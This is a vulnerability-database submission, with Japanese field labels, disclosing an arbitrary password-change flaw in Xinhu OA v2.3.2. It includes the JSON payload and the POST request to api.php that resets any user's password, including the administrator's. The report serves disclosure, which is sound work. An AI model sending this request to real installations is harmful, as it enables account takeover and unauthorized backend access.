| タイトル | Any user's password modification vulnerability in Xinhuo OA V2.3.2 |
|---|
| 説明 | Xinghu OA v2.3.2 has a vulnerability in changing the password of any user in the frontend. An attacker can use this vulnerability to change the administrator password and successfully log in to the backend.
1、The payload generated to change the password is as follows:
The data passed in is
$data='{"msgtype":"editpass","user":"rock","pass":"123"}';, user is the username and pass is the password to be changed.
2、Send request package:
POST /xinhu/api.php?m=reimplat&a=index HTTP/1.1
31ae15.X3amdiGpSx5aZqNWaq6NSZVut2MjYWm5UqdTHn1OQWtPFrKuIalKTZGNW4g |
|---|
| ソース | ⚠️ https://github.com/magicwave18/vuldb/issues/1 |
|---|
| ユーザー | magicwave18 (UID 52598) |
|---|
| 送信 | 2023年09月24日 12:47 (3 年 ago) |
|---|
| モデレーション | 2023年09月29日 16:27 (5 days later) |
|---|
| ステータス | 承諾済み |
|---|
| VulDBエントリ | 240926 [Xinhu RockOA 1.1/2.3.2/15.X3amdi Password api.php?m=reimplat&a=index 特権昇格] |
|---|
| ポイント | 20 |
|---|